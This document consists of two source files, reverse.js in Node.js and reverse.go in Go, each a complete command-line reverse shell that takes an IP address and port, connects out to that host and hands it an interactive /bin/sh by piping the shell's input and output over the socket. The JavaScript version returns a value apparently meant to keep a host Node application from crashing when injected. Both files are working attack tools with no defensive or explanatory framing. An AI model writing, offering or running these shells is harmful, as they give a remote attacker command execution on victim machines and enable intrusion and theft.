File: reverse.js
(function(){
    // Basename
    var path = require('path');
    var basename = path.basename(__filename);

    // Create CLI interface with arguments
    var args = process.argv.slice(2);
    console.log(args);
    if (args.length < 1) {
        console.log("usage: "+ basename +" [-h] IP PORT");
        console.log(basename + ": error: the following arguments are required: IP, PORT");
        return -1;
    }

    if (args.length < 2) {
        console.log("usage: "+ basename +" [-h] PORT");
        console.log(basename + ": error: the following arguments are required: PORT");
        return -1;
    }

    if (args.length > 2) {
        console.log("usage: "+ basename +" [-h] IP PORT");
        console.log(basename + ": error: unrecognized arguments: ", args.slice(2));
        return -1;
    }

    // Parse arguments
    ip_addr = args[0];
    port = parseInt(args[1]);

    // Spawn a child process with the reverse shell
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);

    // Create a Network Socket
    var client = new net.Socket();

    // Connect to remote Machine
    client.connect(port, ip_addr, function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

File: reverse.go
package main;

import (
	"os"
	"os/exec"
	"fmt"
	"net"
	"path/filepath"
);

func main() {
	// Create CLI interface with arguments
	args := os.Args;
	basename := filepath.Base(args[0]);

	if len(args) < 2 {
		fmt.Printf("usage: %s [-h] IP PORT\n", basename);
		fmt.Printf("%s: error: the following arguments are required: IP, PORT\n", basename);
		os.Exit(1)
	}

	if len(args) < 3 {
		fmt.Printf("usage: %s [-h] PORT\n", basename);
		fmt.Printf("%s: error: the following arguments are required: PORT\n", basename);
		os.Exit(1)
	}

	if len(args) > 3 {
		fmt.Printf("usage: %s [-h] IP PORT\n", basename);
		fmt.Printf("%s: error: unrecognized arguments: ", basename);
		fmt.Println(args[3:]);
		os.Exit(1)
	}

	// Parse arguments
	ip_addr := args[1];
	port := args[2];

	// Create a Network Socket and Connect to remote Machine
	c, _ := net.Dial("tcp", ip_addr + ":" + port);

	// Send reverse shell
	cmd := exec.Command("/bin/sh");
	cmd.Stdin = c;
	cmd.Stdout = c;
	cmd.Stderr = c;
	cmd.Run()
}